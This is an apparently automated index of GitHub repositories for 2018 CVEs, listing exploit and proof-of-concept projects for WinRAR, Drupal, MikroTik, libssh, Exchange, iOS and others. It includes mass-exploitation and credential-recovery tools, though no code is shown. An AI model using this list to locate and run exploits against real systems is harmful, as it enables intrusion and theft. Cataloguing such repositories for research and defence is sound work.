**CVE-2018-15982_EXP_IE** : [jas502n/CVE-2018-15982_EXP_IE](https://api.github.com/repos/jas502n/CVE-2018-15982_EXP_IE) create time: 2018-12-12T02:41:31Z

**PrestaShop (1.6.x <= 1.6.1.23 or 1.7.x <= 1.7.4.4) Back Office Remote Code Execution (CVE-2018-19126)** : [farisv/PrestaShop-CVE-2018-19126](https://api.github.com/repos/farisv/PrestaShop-CVE-2018-19126) create time: 2018-12-01T10:53:45Z

**Test utility for cve-2018-1002105** : [gravitational/cve-2018-1002105](https://api.github.com/repos/gravitational/cve-2018-1002105) create time: 2018-12-05T02:51:43Z

**None** : [alexzorin/poc-cve-2018-16875](https://api.github.com/repos/alexzorin/poc-cve-2018-16875) create time: 2018-12-14T00:53:46Z

**Discuz backend getshell** : [FoolMitAh/CVE-2018-14729](https://api.github.com/repos/FoolMitAh/CVE-2018-14729) create time: 2018-08-27T11:58:49Z

**The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 ** : [alt3kx/CVE-2018-7690](https://api.github.com/repos/alt3kx/CVE-2018-7690) create time: 2018-11-26T13:52:45Z

**The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 ** : [alt3kx/CVE-2018-7691](https://api.github.com/repos/alt3kx/CVE-2018-7691) create time: 2018-11-26T13:54:08Z

**MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞** : [jas502n/CVE-2018-14847](https://api.github.com/repos/jas502n/CVE-2018-14847) create time: 2018-12-15T10:38:26Z

**None** : [20matan/CVE-2018-6574-POC](https://api.github.com/repos/20matan/CVE-2018-6574-POC) create time: 2018-12-16T21:55:27Z

**CVE-2018-1270 表达式RCE环境** : [Venscor/CVE-2018-1270](https://api.github.com/repos/Venscor/CVE-2018-1270) create time: 2018-12-17T02:22:53Z

**Leveraging CVE-2018-19788 without root shells** : [Ekultek/PoC](https://api.github.com/repos/Ekultek/PoC) create time: 2018-12-17T19:26:22Z

**None** : [qiantu88/CVE-2018-8120](https://api.github.com/repos/qiantu88/CVE-2018-8120) create time: 2018-12-19T10:58:55Z

**https://github.com/milo2012/CVE-2018-0296.git** : [qiantu88/CVE-2018-0296](https://api.github.com/repos/qiantu88/CVE-2018-0296) create time: 2018-12-19T11:57:43Z

**LibSSH Authentication Bypass CVE-2018-10933** : [nikhil1232/LibSSH-Authentication-Bypass](https://api.github.com/repos/nikhil1232/LibSSH-Authentication-Bypass) create time: 2018-12-19T15:33:00Z

**None** : [Yable/CVE-2018-4878](https://api.github.com/repos/Yable/CVE-2018-4878) create time: 2018-12-19T13:22:03Z

**Flash 2018-15982 UAF ** : [SyFi/CVE-2018-15982](https://api.github.com/repos/SyFi/CVE-2018-15982) create time: 2018-12-20T02:40:22Z

**PoC for CVE-2018-1002105.** : [evict/poc_CVE-2018-1002105](https://api.github.com/repos/evict/poc_CVE-2018-1002105) create time: 2018-12-06T11:28:02Z

**CVE-2018-6574** : [zur250/Zur-Go-GET-RCE-Solution](https://api.github.com/repos/zur250/Zur-Go-GET-RCE-Solution) create time: 2018-12-25T07:08:55Z

**PoC for Foxit Reader CVE-2018-14442** : [payatu/CVE-2018-14442](https://api.github.com/repos/payatu/CVE-2018-14442) create time: 2018-12-28T08:29:28Z

**CVE-2018-8581** : [qiantu88/CVE-2018-8581](https://api.github.com/repos/qiantu88/CVE-2018-8581) create time: 2018-12-28T15:47:32Z

**PoC Exploit iOS 12 to iOS 12.1 (CVE-2018-4431)** : [ktiOSz/PoC_iOS12](https://api.github.com/repos/ktiOSz/PoC_iOS12) create time: 2018-12-28T17:26:35Z

**CVE-2018-8581 | Microsoft Exchange Server Elevation of Privilege Vulnerability** : [WyAtu/CVE-2018-8581](https://api.github.com/repos/WyAtu/CVE-2018-8581) create time: 2018-12-27T06:30:32Z

**CVE-2018-4407,iOS exploit** : [zeng9t/CVE-2018-4407-iOS-exploit](https://api.github.com/repos/zeng9t/CVE-2018-4407-iOS-exploit) create time: 2018-12-31T08:24:06Z

**Exploiting The CVE-2018-19788 PolicyKit Bug** : [jhlongjr/CVE-2018-19788](https://api.github.com/repos/jhlongjr/CVE-2018-19788) create time: 2018-12-31T16:54:58Z

**exp of CVE-2018-15982** : [Ridter/CVE-2018-15982_EXP](https://api.github.com/repos/Ridter/CVE-2018-15982_EXP) create time: 2018-12-10T04:53:31Z

**2018-cve** : [qiantu88/2018-cve](https://api.github.com/repos/qiantu88/2018-cve) create time: 2019-01-05T11:16:38Z

**Apache Karaf XXE Vulnerability (CVE-2018-11788)** : [brianwrf/CVE-2018-11788](https://api.github.com/repos/brianwrf/CVE-2018-11788) create time: 2019-01-06T11:01:39Z

**CVE-2018-6389 PoC node js multisite with proxy** : [fakedob/tvsz](https://api.github.com/repos/fakedob/tvsz) create time: 2019-01-06T22:57:48Z

**cve-2018-7600** : [cved-sources/cve-2018-7600](https://api.github.com/repos/cved-sources/cve-2018-7600) create time: 2019-01-06T23:41:33Z

**漏洞利用工具** : [0xMJ/CVE-2018-2628](https://api.github.com/repos/0xMJ/CVE-2018-2628) create time: 2019-01-07T11:47:59Z

**CVE-2018-6574** : [veter069/go-get-rce](https://api.github.com/repos/veter069/go-get-rce) create time: 2019-01-10T11:09:06Z

**cve-2018-16509** : [cved-sources/cve-2018-16509](https://api.github.com/repos/cved-sources/cve-2018-16509) create time: 2019-01-11T22:19:46Z

**some works on CVE-2018-19518 ** : [ensimag-security/CVE-2018-19518](https://api.github.com/repos/ensimag-security/CVE-2018-19518) create time: 2018-12-31T16:36:49Z

**None** : [kastellanos/CVE-2018-7602](https://api.github.com/repos/kastellanos/CVE-2018-7602) create time: 2018-10-29T12:08:53Z

**Crashes any macOS High Sierra or iOS 11 device that is on the same WiFi network** : [anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407](https://api.github.com/repos/anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407) create time: 2018-11-07T21:41:39Z

**Tool for CVE-2018-16323** : [ttffdd/XBadManners](https://api.github.com/repos/ttffdd/XBadManners) create time: 2018-11-18T15:30:46Z

**cve-2018-8453 exp** : [Mkv4/cve-2018-8453-exp](https://api.github.com/repos/Mkv4/cve-2018-8453-exp) create time: 2019-01-18T05:24:22Z

**None** : [duckzsc2/CVE-2018-6574-POC](https://api.github.com/repos/duckzsc2/CVE-2018-6574-POC) create time: 2019-01-18T05:22:25Z

**cve-2018-15961** : [cved-sources/cve-2018-15961](https://api.github.com/repos/cved-sources/cve-2018-15961) create time: 2019-01-21T18:15:17Z

**This exploit for CVE 2018-11759, vulnerability in apache mod_jk, module for load-balancer** : [Jul10l1r4/Identificador-CVE-2018-11759](https://api.github.com/repos/Jul10l1r4/Identificador-CVE-2018-11759) create time: 2018-12-08T02:32:14Z

**Apache Tika Denial of Service Vulnerability (CVE-2018-11761)** : [brianwrf/CVE-2018-11761](https://api.github.com/repos/brianwrf/CVE-2018-11761) create time: 2019-01-23T03:40:26Z

**This is a exp of CVE-2018-15473** : [LINYIKAI/CVE-2018-15473-exp](https://api.github.com/repos/LINYIKAI/CVE-2018-15473-exp) create time: 2019-01-23T07:25:21Z

**(CVE-2018-9995) Get DVR Credentials** : [ezelf/CVE-2018-9995_dvr_credentials](https://api.github.com/repos/ezelf/CVE-2018-9995_dvr_credentials) create time: 2018-04-29T20:00:06Z

**Reflected XSS on Opentext Portal v7.4.4: CVE-2018-20165** : [hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4](https://api.github.com/repos/hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4) create time: 2019-01-24T13:59:14Z

**Knot Resolver CVE-2018-10920 / DO NOT ABUSE** : [shutingrz/CVE-2018-10920_PoC](https://api.github.com/repos/shutingrz/CVE-2018-10920_PoC) create time: 2019-01-25T16:24:49Z

**CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.** : [hook-s3c/CVE-2018-18852](https://api.github.com/repos/hook-s3c/CVE-2018-18852) create time: 2019-01-26T03:41:24Z

**DVR username password recovery.** : [codeholic2k18/CVE-2018-9995](https://api.github.com/repos/codeholic2k18/CVE-2018-9995) create time: 2019-01-28T00:16:48Z

**veloCloud VMWare - Vulnerability** : [bokanrb/CVE-2018-6961](https://api.github.com/repos/bokanrb/CVE-2018-6961) create time: 2018-09-12T19:44:15Z

**CVE-2018-16509 (Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities)** : [knqyf263/CVE-2018-16509](https://api.github.com/repos/knqyf263/CVE-2018-16509) create time: 2018-11-17T12:26:38Z

**cve-2018-17207** : [cved-sources/cve-2018-17207](https://api.github.com/repos/cved-sources/cve-2018-17207) create time: 2019-02-01T20:36:08Z

**cve-2018-11776** : [cved-sources/cve-2018-11776](https://api.github.com/repos/cved-sources/cve-2018-11776) create time: 2019-01-06T22:47:25Z

**cve-2018-1273** : [cved-sources/cve-2018-1273](https://api.github.com/repos/cved-sources/cve-2018-1273) create time: 2019-01-17T17:55:17Z

**cve-2018-9206** : [cved-sources/cve-2018-9206](https://api.github.com/repos/cved-sources/cve-2018-9206) create time: 2019-01-11T22:23:06Z

**cve-2018-9207** : [cved-sources/cve-2018-9207](https://api.github.com/repos/cved-sources/cve-2018-9207) create time: 2019-01-11T23:34:00Z

**cve-2018-9208** : [cved-sources/cve-2018-9208](https://api.github.com/repos/cved-sources/cve-2018-9208) create time: 2019-01-11T22:28:36Z

**cve-2018-15473** : [cved-sources/cve-2018-15473](https://api.github.com/repos/cved-sources/cve-2018-15473) create time: 2019-01-11T22:17:08Z

**cve-2018-3810** : [cved-sources/cve-2018-3810](https://api.github.com/repos/cved-sources/cve-2018-3810) create time: 2019-02-02T21:19:32Z

**cve-2018-3811** : [cved-sources/cve-2018-3811](https://api.github.com/repos/cved-sources/cve-2018-3811) create time: 2019-02-02T21:22:49Z

**VMware NSX SD-WAN command injection vulnerability ** : [r3dxpl0it/CVE-2018-6961](https://api.github.com/repos/r3dxpl0it/CVE-2018-6961) create time: 2019-02-08T13:00:35Z

**PoC for CVE-2018-20343** : [Alexandre-Bartel/CVE-2018-20343](https://api.github.com/repos/Alexandre-Bartel/CVE-2018-20343) create time: 2018-12-28T10:49:51Z

**cve-2018-15877** : [cved-sources/cve-2018-15877](https://api.github.com/repos/cved-sources/cve-2018-15877) create time: 2019-02-08T18:15:37Z

**Takes advantage of CVE-2018-10933** : [Kurlee/LibSSH-exploit](https://api.github.com/repos/Kurlee/LibSSH-exploit) create time: 2019-02-10T13:55:06Z

**exploit for CVE-2018-4193** : [Synacktiv-contrib/CVE-2018-4193](https://api.github.com/repos/Synacktiv-contrib/CVE-2018-4193) create time: 2019-02-13T13:06:11Z

**None** : [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://api.github.com/repos/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape) create time: 2019-02-14T02:20:13Z

**Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847) ** : [th3f3n1x87/winboxPOC](https://api.github.com/repos/th3f3n1x87/winboxPOC) create time: 2019-04-01T07:20:23Z

**CVE-2018-4087 PoC** : [rani-i/bluetoothdPoC](https://api.github.com/repos/rani-i/bluetoothdPoC) create time: 2018-02-21T12:55:37Z

**patch to fix CVE-2018-13410 of zip-30** : [shinecome/zip](https://api.github.com/repos/shinecome/zip) create time: 2019-02-21T01:29:00Z

**010 Editor template for ACE archive format & CVE-2018-2025[0-3]** : [QAX-A-Team/CVE-2018-20250](https://api.github.com/repos/QAX-A-Team/CVE-2018-20250) create time: 2019-02-22T06:47:01Z

**None** : [nmweizi/CVE-2018-20250-poc-winrar](https://api.github.com/repos/nmweizi/CVE-2018-20250-poc-winrar) create time: 2019-02-22T13:18:14Z

**A version of the binary patched to address CVE-2018-20250** : [blunden/UNACEV2.DLL-CVE-2018-20250](https://api.github.com/repos/blunden/UNACEV2.DLL-CVE-2018-20250) create time: 2019-02-22T14:19:20Z

**CVE-2018-4407 IOS/macOS kernel crash** : [WyAtu/CVE-2018-4407](https://api.github.com/repos/WyAtu/CVE-2018-4407) create time: 2018-11-02T08:40:33Z

**Python CVE-2019-1003000 and CVE-2018-1999002 Pre-Auth RCE Jenkins ** : [0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://api.github.com/repos/0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins) create time: 2019-02-23T10:00:03Z

**个人整理的Centos7.x + Kubernetes-1.12.3 + Dashboard-1.8.3 无 CVE-2018-1002105 漏洞的master节点全自动快速一键安装部署文件,适用于测试环境,生产环境的快速安装部署** : [imlzw/Kubernetes-1.12.3-all-auto-install](https://api.github.com/repos/imlzw/Kubernetes-1.12.3-all-auto-install) create time: 2018-12-10T03:14:55Z

**None** : [ivnnn1/CVE-2018-6574](https://api.github.com/repos/ivnnn1/CVE-2018-6574) create time: 2019-02-28T07:31:17Z

**None** : [STP5940/CVE-2018-20250](https://api.github.com/repos/STP5940/CVE-2018-20250) create time: 2019-02-28T17:07:52Z

**Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).** : [easis/CVE-2018-20250-WinRAR-ACE](https://api.github.com/repos/easis/CVE-2018-20250-WinRAR-ACE) create time: 2019-02-23T01:20:34Z

**PoC Exploit for AOSP UserDictionary Content Provider (CVE-2018-9375)** : [IOActive/AOSP-ExploitUserDictionary](https://api.github.com/repos/IOActive/AOSP-ExploitUserDictionary) create time: 2018-07-30T14:54:34Z

**None** : [samueldustin/cve-2018-14665](https://api.github.com/repos/samueldustin/cve-2018-14665) create time: 2019-03-03T19:12:56Z

**WinRar is a very widely known software for windows. Previous version of WinRaR was a vulnerability which has been patched in Feb-2019. Most of the people didn't update winrar so they are vulnerable in this Absolute Path Traversal bug [CVE-2018-20250]** : [technicaldada/hack-winrar](https://api.github.com/repos/technicaldada/hack-winrar) create time: 2019-03-04T11:36:43Z

**Exploit for Oracle Access Manager padding oracle vulnerability (CVE-2018-2879)** : [AymanElSherif/oracle-oam-authentication-bypas-exploit](https://api.github.com/repos/AymanElSherif/oracle-oam-authentication-bypas-exploit) create time: 2018-07-29T18:56:25Z

**Simple POC to leverage CVE-2018-20250 from inside an EXE** : [n4r1b/WinAce-POC](https://api.github.com/repos/n4r1b/WinAce-POC) create time: 2019-03-04T11:34:17Z

**None** : [alessiogilardi/PoC---CVE-2018-6389](https://api.github.com/repos/alessiogilardi/PoC---CVE-2018-6389) create time: 2018-02-28T07:14:54Z

**Python tool exploiting CVE-2018-20250 found by CheckPoint folks** : [Ektoplasma/ezwinrar](https://api.github.com/repos/Ektoplasma/ezwinrar) create time: 2019-03-05T13:05:03Z

**Exploitation of VirtualBox vulnerability (https://nvd.nist.gov/vuln/detail/CVE-2018-3295)** : [ndureiss/e1000_vulnerability_exploit](https://api.github.com/repos/ndureiss/e1000_vulnerability_exploit) create time: 2019-02-11T21:44:47Z

**None** : [coolboy0816/CVE-2018-8943](https://api.github.com/repos/coolboy0816/CVE-2018-8943) create time: 2019-03-08T07:42:32Z

**A WebKit exploit using CVE-2018-4441 to obtain RCE on PS4 6.20.** : [Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit](https://api.github.com/repos/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit) create time: 2019-03-08T18:06:10Z

**None** : [AeolusTF/CVE-2018-20250](https://api.github.com/repos/AeolusTF/CVE-2018-20250) create time: 2019-03-11T07:33:45Z

**CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE** : [mpgn/CVE-2018-19276](https://api.github.com/repos/mpgn/CVE-2018-19276) create time: 2019-03-11T21:28:55Z

**Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133** : [darrynten/MoodleExploit](https://api.github.com/repos/darrynten/MoodleExploit) create time: 2019-03-15T14:25:20Z

**cve-2018-16283** : [cved-sources/cve-2018-16283](https://api.github.com/repos/cved-sources/cve-2018-16283) create time: 2019-03-15T18:07:13Z

**cve-2018-19207** : [cved-sources/cve-2018-19207](https://api.github.com/repos/cved-sources/cve-2018-19207) create time: 2019-03-15T18:09:58Z

**cve-2018-1133 moodle athenticated as teacher remote code execution. ** : [Feidao-fei/MOODLE-3.X-Remote-Code-Execution](https://api.github.com/repos/Feidao-fei/MOODLE-3.X-Remote-Code-Execution) create time: 2020-12-26T08:09:19Z

**None** : [gluxon/CVE-2018-13257](https://api.github.com/repos/gluxon/CVE-2018-13257) create time: 2019-03-16T16:37:53Z

**thinkphp5.*Rce CVE-2018-20062** : [NS-Sp4ce/thinkphp5.XRce](https://api.github.com/repos/NS-Sp4ce/thinkphp5.XRce) create time: 2019-03-17T04:31:13Z

**CVE-2018-16890** : [zjw88282740/CVE-2018-16890](https://api.github.com/repos/zjw88282740/CVE-2018-16890) create time: 2019-03-19T05:10:48Z

**None** : [dollyptm/cve-2018-6574](https://api.github.com/repos/dollyptm/cve-2018-6574) create time: 2019-03-19T12:54:23Z

**Herramienta para revisar si es que un payload tiene componente malicioso de acuerdo a CVE-2018-20250** : [joydragon/Detect-CVE-2018-20250](https://api.github.com/repos/joydragon/Detect-CVE-2018-20250) create time: 2019-03-19T14:51:52Z

**GUI版 EXP** : [SkyBlueEternal/CVE-2018-1335-EXP-GUI](https://api.github.com/repos/SkyBlueEternal/CVE-2018-1335-EXP-GUI) create time: 2019-03-20T14:38:09Z

**CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6** : [mpgn/CVE-2018-11686](https://api.github.com/repos/mpgn/CVE-2018-11686) create time: 2019-03-20T19:36:10Z

**None** : [bolonobolo/CVE-2018-14665](https://api.github.com/repos/bolonobolo/CVE-2018-14665) create time: 2018-11-02T01:09:37Z

**Multi-threaded, IPv6 aware, wordlists/single-user username enumeration via CVE-2018-15473** : [epi052/cve-2018-15473](https://api.github.com/repos/epi052/cve-2018-15473) create time: 2018-10-03T10:18:04Z

**CVE-2018-7600** : [drugeddon/drupal-exploit](https://api.github.com/repos/drugeddon/drupal-exploit) create time: 2019-03-24T10:44:06Z

**This program is an script developed in Python which exploit the ACE vulnerability on WinRar - Vulnerability CVE-2018-20250** : [DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250](https://api.github.com/repos/DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250) create time: 2019-03-25T04:22:14Z

**Security & Privacy in Computing(Fall 2018), Final Group Project at JHUISI, clamscan vulnerability in Cisco's ClamAV 0.99.3** : [jaychowjingjie/CVE-2018-0202](https://api.github.com/repos/jaychowjingjie/CVE-2018-0202) create time: 2018-11-24T01:18:52Z

**CVE-2018-19487, CVE-2018-19488, exploit for WordPress wp-jobhunt plugin** : [Antho59/wp-jobhunt-exploit](https://api.github.com/repos/Antho59/wp-jobhunt-exploit) create time: 2018-12-04T13:36:13Z

**💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002** : [a2u/CVE-2018-7600](https://api.github.com/repos/a2u/CVE-2018-7600) create time: 2018-03-30T14:23:18Z

**None** : [ZecOps/TELUGU_CVE-2018-4124_POC](https://api.github.com/repos/ZecOps/TELUGU_CVE-2018-4124_POC) create time: 2019-04-03T15:44:43Z

**Or how I turn off my TV via a cronjob** : [Nurdilin/CVE-2018-16706](https://api.github.com/repos/Nurdilin/CVE-2018-16706) create time: 2019-04-07T08:30:12Z

**None** : [ze0r/CVE-2018-8639-exp](https://api.github.com/repos/ze0r/CVE-2018-8639-exp) create time: 2019-03-05T14:18:07Z

**A simple POC for CVE-2018-6574** : [qweraqq/CVE-2018-6574](https://api.github.com/repos/qweraqq/CVE-2018-6574) create time: 2019-04-08T08:49:44Z

**CVE-2018-11235-Git PoC** : [qweraqq/CVE-2018-11235-Git-Submodule-CE](https://api.github.com/repos/qweraqq/CVE-2018-11235-Git-Submodule-CE) create time: 2019-04-09T05:48:22Z

**None** : [lilang-wu/POC-CVE-2018-4411](https://api.github.com/repos/lilang-wu/POC-CVE-2018-4411) create time: 2019-04-10T08:55:55Z

**None** : [quantiti/CVE-2018-8284-Sharepoint-RCE](https://api.github.com/repos/quantiti/CVE-2018-8284-Sharepoint-RCE) create time: 2019-04-11T08:41:41Z

**CVE-2018-16858 exploit implementation** : [4nimanegra/libreofficeExploit1](https://api.github.com/repos/4nimanegra/libreofficeExploit1) create time: 2019-04-14T11:10:18Z

**A python script that tests for an exploitable instance of CVE-2018-1235.** : [AbsoZed/CVE-2018-1235](https://api.github.com/repos/AbsoZed/CVE-2018-1235) create time: 2019-04-17T18:37:00Z

**PoC for CVE-2018-18500 - Firefox Use-After-Free** : [sophoslabs/CVE-2018-18500](https://api.github.com/repos/sophoslabs/CVE-2018-18500) create time: 2019-04-18T00:26:10Z

**CVE-2018-6574** : [d4rkshell/go-get-rce](https://api.github.com/repos/d4rkshell/go-get-rce) create time: 2019-04-19T12:21:41Z

**None** : [TateYdq/CVE-2018-9995-ModifiedByGwolfs](https://api.github.com/repos/TateYdq/CVE-2018-9995-ModifiedByGwolfs) create time: 2019-04-20T08:28:47Z

**None** : [likescam/CVE-2018-20250](https://api.github.com/repos/likescam/CVE-2018-20250) create time: 2019-04-25T02:30:50Z

**The official exploit code for LibreNMS v1.46 Remote Code Execution CVE-2018-20434** : [mhaskar/CVE-2018-20434](https://api.github.com/repos/mhaskar/CVE-2018-20434) create time: 2019-04-25T11:06:48Z

**ios 缓冲区溢出exp** : [5431/CVE-2018-4407](https://api.github.com/repos/5431/CVE-2018-4407) create time: 2019-04-28T08:19:48Z

**Spring Data Commons RCE 远程命令执行漏洞** : [jas502n/cve-2018-1273](https://api.github.com/repos/jas502n/cve-2018-1273) create time: 2019-04-29T03:43:15Z

**None** : [mekhalleh/cve-2018-6574](https://api.github.com/repos/mekhalleh/cve-2018-6574) create time: 2018-12-30T22:30:01Z

**TP-Link TL-WR1043ND - Authenticated Remote Code Execution** : [hdbreaker/CVE-2018-16119](https://api.github.com/repos/hdbreaker/CVE-2018-16119) create time: 2018-10-19T08:50:52Z

**PoC command injection example for cve-2018-1002105 based off https://github.com/gravitational/cve-2018-1002105** : [bgeesaman/cve-2018-1002105](https://api.github.com/repos/bgeesaman/cve-2018-1002105) create time: 2019-04-30T15:01:23Z

**A C# module to detect if a Jenkins server is vulnerable to the RCE vulnerability found in CVE-2019-1003000 (chained with CVE-2018-1000861 for pre-auth RCE)** : [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://api.github.com/repos/1NTheKut/CVE-2019-1003000_RCE-DETECTION) create time: 2019-04-24T23:52:42Z

**CVE-2018-12386 - Firefox Sandboxed RCE Exploit for Linux (Firefox <v62.0.3)** : [Hydra3evil/cve-2018-12386](https://api.github.com/repos/Hydra3evil/cve-2018-12386) create time: 2019-08-09T07:58:03Z

**CVE-2018-20250-WINRAR-ACE Exploit with a UI** : [arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI](https://api.github.com/repos/arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI) create time: 2019-03-08T12:27:12Z

**Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux** : [mmxsrup/CVE-2018-3639](https://api.github.com/repos/mmxsrup/CVE-2018-3639) create time: 2019-05-11T12:11:05Z

**Proof of Concept - RCE Exploitation : Git submodules' names vulnerability - Ensimag November 2018** : [ygouzerh/CVE-2018-11235](https://api.github.com/repos/ygouzerh/CVE-2018-11235) create time: 2018-12-03T18:50:27Z

**Pinned version of rsyslov vulnerable to CVE-2018-1000140** : [s0/rsyslog-librelp-CVE-2018-1000140](https://api.github.com/repos/s0/rsyslog-librelp-CVE-2018-1000140) create time: 2019-05-14T21:02:07Z

**None** : [s0/rsyslog-librelp-CVE-2018-1000140-fixed](https://api.github.com/repos/s0/rsyslog-librelp-CVE-2018-1000140-fixed) create time: 2019-05-14T21:58:54Z

**Cette exploit en python va vous permettre de créer des listes de sites et les exploiter rapidement.** : [Bilelxdz/Laravel-CVE-2018-15133](https://api.github.com/repos/Bilelxdz/Laravel-CVE-2018-15133) create time: 2020-02-25T18:36:13Z

**None** : [chaosura/CVE-2018-6574](https://api.github.com/repos/chaosura/CVE-2018-6574) create time: 2019-05-16T15:02:22Z

**Exploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)** : [ruthlezs/ie11_vbscript_exploit](https://api.github.com/repos/ruthlezs/ie11_vbscript_exploit) create time: 2019-05-23T10:28:40Z

** Mass MikroTik WinBox Exploitation tool, CVE-2018-14847 ** : [mahmoodsabir/mikrotik-beast](https://api.github.com/repos/mahmoodsabir/mikrotik-beast) create time: 2019-05-26T12:26:55Z

**None** : [ABIZCHI/CVE-2018-9995_dvr_credentials](https://api.github.com/repos/ABIZCHI/CVE-2018-9995_dvr_credentials) create time: 2019-05-28T01:05:16Z

**git {<2.13.7, <2.14.4, <2.15.2, <2.16.4, <2.17.1} remote code execution** : [jhswartz/CVE-2018-11235](https://api.github.com/repos/jhswartz/CVE-2018-11235) create time: 2019-06-03T08:24:16Z

**CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection** : [mpgn/CVE-2018-16341](https://api.github.com/repos/mpgn/CVE-2018-16341) create time: 2019-06-05T18:24:45Z

**None** : [799600966/CVE-2018-17456](https://api.github.com/repos/799600966/CVE-2018-17456) create time: 2019-06-05T15:10:09Z

**exploit tool of CVE-2018-10118** : [GeunSam2/CVE-2018-10118](https://api.github.com/repos/GeunSam2/CVE-2018-10118) create time: 2019-06-10T15:13:25Z

**exploit tool of CVE-2018-11564** : [GeunSam2/CVE-2018-11564](https://api.github.com/repos/GeunSam2/CVE-2018-11564) create time: 2019-06-10T15:15:07Z

**POC of CVE-2018-8718 + tool** : [GeunSam2/CVE-2018-8718](https://api.github.com/repos/GeunSam2/CVE-2018-8718) create time: 2019-06-10T15:16:41Z

**None** : [VikasVarshney/cve_test_2018_6574](https://api.github.com/repos/VikasVarshney/cve_test_2018_6574) create time: 2019-06-15T13:35:13Z

**None** : [IHA114/CVE-2018-9995_dvr_credentials](https://api.github.com/repos/IHA114/CVE-2018-9995_dvr_credentials) create time: 2019-06-16T11:18:00Z

**None** : [pwnhacker0x18/CVE-2018-19864](https://api.github.com/repos/pwnhacker0x18/CVE-2018-19864) create time: 2019-06-18T19:54:26Z

**OpenSSH 用户名枚举漏洞(CVE-2018-15473)** : [trickster1103/-](https://api.github.com/repos/trickster1103/-) create time: 2019-06-19T13:37:58Z

**CVE-2018-8581** : [Ridter/Exchange2domain](https://api.github.com/repos/Ridter/Exchange2domain) create time: 2019-01-24T06:08:23Z

**Repo for a uni project to give a detailed explanation of CVE-2018-1000224** : [zann1x/ITS](https://api.github.com/repos/zann1x/ITS) create time: 2019-04-28T18:31:03Z

**CVE-2018-17456漏洞复现(PoC+Exp)** : [AnonymKing/CVE-2018-17456](https://api.github.com/repos/AnonymKing/CVE-2018-17456) create time: 2019-06-21T03:17:26Z

**CVE-2018-11235(PoC && Exp)** : [AnonymKing/CVE-2018-11235](https://api.github.com/repos/AnonymKing/CVE-2018-11235) create time: 2019-06-22T14:39:08Z

**spectre v4 : Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux** : [Shuiliusheng/CVE-2018-3639-specter-v4-](https://api.github.com/repos/Shuiliusheng/CVE-2018-3639-specter-v4-) create time: 2019-06-26T14:26:13Z

**None** : [JasonLOU/CVE_2018_15982](https://api.github.com/repos/JasonLOU/CVE_2018_15982) create time: 2019-06-27T02:02:17Z

**None** : [thepwnrip/leHACK-Analysis-of-CVE-2018-8453](https://api.github.com/repos/thepwnrip/leHACK-Analysis-of-CVE-2018-8453) create time: 2019-07-08T13:06:10Z

**None** : [morhax/CVE-2018-11235](https://api.github.com/repos/morhax/CVE-2018-11235) create time: 2019-07-09T08:28:49Z

**None** : [us3r777/CVE-2018-20718](https://api.github.com/repos/us3r777/CVE-2018-20718) create time: 2019-07-10T18:19:59Z

**软件系统安全结课作业:[漏洞复现] CVE-2018-4878 Flash 0day** : [HuanWoWeiLan/SoftwareSystemSecurity-2019](https://api.github.com/repos/HuanWoWeiLan/SoftwareSystemSecurity-2019) create time: 2019-07-17T16:41:09Z

**CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.** : [andripwn/CVE-2018-18852](https://api.github.com/repos/andripwn/CVE-2018-18852) create time: 2019-07-18T20:57:59Z

**None** : [jguard01/cve-2018-11882](https://api.github.com/repos/jguard01/cve-2018-11882) create time: 2019-07-19T01:40:05Z

**None** : [Y0n0Y/cve-2018-8120-exp](https://api.github.com/repos/Y0n0Y/cve-2018-8120-exp) create time: 2019-07-20T14:21:03Z

**Scripts for exploiting MSA-18-0020 (CVE-2018-16854) and MSA-19-0004 (CVE-2019-3847)** : [danielthatcher/moodle-login-csrf](https://api.github.com/repos/danielthatcher/moodle-login-csrf) create time: 2019-04-04T17:24:47Z

**ptl cve-2018-6574** : [french560/ptl6574](https://api.github.com/repos/french560/ptl6574) create time: 2019-07-22T13:13:06Z

**收集网上CVE-2018-0708的poc和exp(目前没有找到exp)** : [ntkernel0/CVE-2019-0708](https://api.github.com/repos/ntkernel0/CVE-2019-0708) create time: 2019-07-25T01:05:21Z

**None** : [quandqn/cve-2018-14667](https://api.github.com/repos/quandqn/cve-2018-14667) create time: 2019-07-29T03:22:22Z

**This repository contains the POC of an exploit for node-jose < 0.11.0** : [zi0Black/POC-CVE-2018-0114](https://api.github.com/repos/zi0Black/POC-CVE-2018-0114) create time: 2018-03-20T20:37:29Z

